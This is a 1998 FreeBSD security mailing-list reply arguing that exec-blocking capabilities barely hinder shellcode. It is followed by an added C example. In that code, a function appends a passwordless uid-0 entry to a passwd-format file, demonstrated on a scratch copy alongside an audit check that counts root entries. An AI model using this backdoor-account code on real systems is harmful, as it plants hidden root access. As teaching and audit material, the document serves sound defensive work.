From: Warner Losh
To: Philippe Regnauld
Cc: rotel@indigo.ie, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: "Using capabilities against shell code"
Date: Sun, 16 Aug 1998 12:45:52 -0600
Message-Id: <199808161845.MAA16986@harmony.village.org>
In-reply-to: Your message of "Sun, 16 Aug 1998 15:10:56 +0200." <19980816151056.63692@deepo.prosa.dk>
References: <19980816151056.63692@deepo.prosa.dk> <19980815131309.14782@deepo.prosa.dk> <199808151348.OAA00655@indigo.ie>

In message <19980816151056.63692@deepo.prosa.dk> Philippe Regnauld writes:
: No, but it will prevent buffer overflows that spawn a root shell
: (i.e.: qpopper) -- or am I missing something?

Yes. It adds little to the security of the system. Currently it is all the rage for the egg to do setuid(0); exec /bin/sh. However, if you don't allow that, then there are other things that you'll have to make sure are plugged as well. If you should happen to overflow the stack, you can still execute any code that you want. You can bind to a port, accept connections and get enough of a world that not being able to exec isn't a huge deal.
There is more work for the egg to do, but the size of the stack is large enough to have some rather complicated eggs that do things like malloc memory, copy code into that, jump to it, etc. You would still be able to do at least some system calls, even with the fine-grained capabilities. Likely you could do enough "damage" to the system that needing a root shell becomes unnecessary.

The egg that comes to mind: setuid(0); edit /etc/passwd, et al., to have another root entry; then the penetrator can just telnet to the system and have root. There are many other variations on this theme.

Sure, it will keep the script-bangers out, until the scripts improve, and then you are back where you are today.

Warner
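The "edit /etc/passwd" egg Warner describes, as an added example that is not part of the original message or of FreeBSD: the payload side needs nothing but open(2) and write(2), so a capability that only forbids exec() never comes into play, and the audit side is the check a practitioner would run afterwards (count the entries whose uid field is 0; a healthy system has exactly one). The sample passwd contents, the entry name "egg", the function names and the /tmp scratch path are all constructed for this illustration.

```c
/* Added example, not code from the original list message or from FreeBSD.
 * Shows (a) an egg that adds a second uid-0 account using only open()/write(),
 * never exec(), and (b) the audit check that catches it.  The sample passwd
 * data, the account name "egg", the /tmp path and all names are constructed. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample of a passwd-format file (not any real system's). */
static const char SAMPLE_PASSWD[] =
    "root:*:0:0:Charlie &:/root:/bin/csh\n"
    "daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin\n"
    "operator:*:2:5:System &:/:/sbin/nologin\n"
    "nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin\n";

/* Parse the uid field (third field) of one passwd line.  Written with
 * strchr() rather than strtok(), because strtok() collapses the empty
 * password field ("egg::0:0:...") and would return the wrong column.
 * Returns the uid, or -1 if the line is not a well-formed entry. */
int uid_field(const char *line)
{
    const char *p = line;
    for (int i = 0; i < 2; i++) {        /* skip name and password fields */
        p = strchr(p, ':');
        if (!p) return -1;
        p++;
    }
    char *end;
    long uid = strtol(p, &end, 10);
    if (end == p || *end != ':') return -1;
    return (int)uid;
}

/* The egg's entire job: append one uid-0 line.  Only open()/write() are
 * used; there is no exec() for an exec-blocking capability to deny.
 * Returns 0 on success, -1 on failure. */
int append_root_entry(const char *path, const char *name)
{
    char line[256];
    int n = snprintf(line, sizeof line, "%s::0:0::/:/bin/sh\n", name);
    if (n < 0 || (size_t)n >= sizeof line) return -1;
    int fd = open(path, O_WRONLY | O_APPEND);
    if (fd < 0) return -1;
    ssize_t w = write(fd, line, (size_t)n);
    close(fd);
    return w == n ? 0 : -1;
}

/* Audit check: how many entries have uid 0?  Anything but 1 is suspicious.
 * Returns the count, or -1 if the file cannot be read. */
int count_uid0_entries(const char *path)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    char buf[512];
    int count = 0;
    while (fgets(buf, sizeof buf, f))
        if (uid_field(buf) == 0) count++;
    fclose(f);
    return count;
}

/* Run the whole scenario against a scratch copy of the sample file.
 * Reports the uid-0 count before and after the egg; returns 0 on success. */
int demo_no_exec_egg(int *before, int *after)
{
    char path[] = "/tmp/passwd_demo_XXXXXX";   /* scratch file, assumption */
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t len = sizeof SAMPLE_PASSWD - 1;
    if (write(fd, SAMPLE_PASSWD, len) != (ssize_t)len) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);
    *before = count_uid0_entries(path);
    int rc = append_root_entry(path, "egg");
    *after = count_uid0_entries(path);
    unlink(path);
    return rc;
}

int main(void)
{
    int before, after;
    if (demo_no_exec_egg(&before, &after) != 0) return 1;
    printf("uid-0 entries before egg: %d, after egg: %d\n", before, after);
    return 0;
}
```

The egg side is deliberately boring: the point is that its syscall footprint (open, write, and a setuid(0) it would already have run) is the same one legitimate root programs use, so a policy that only removes exec() from a compromised daemon leaves this path open. The `count_uid0_entries` check is the cheap thing to add to a periodic integrity audit so that the extra entry does not sit unnoticed until someone telnets in.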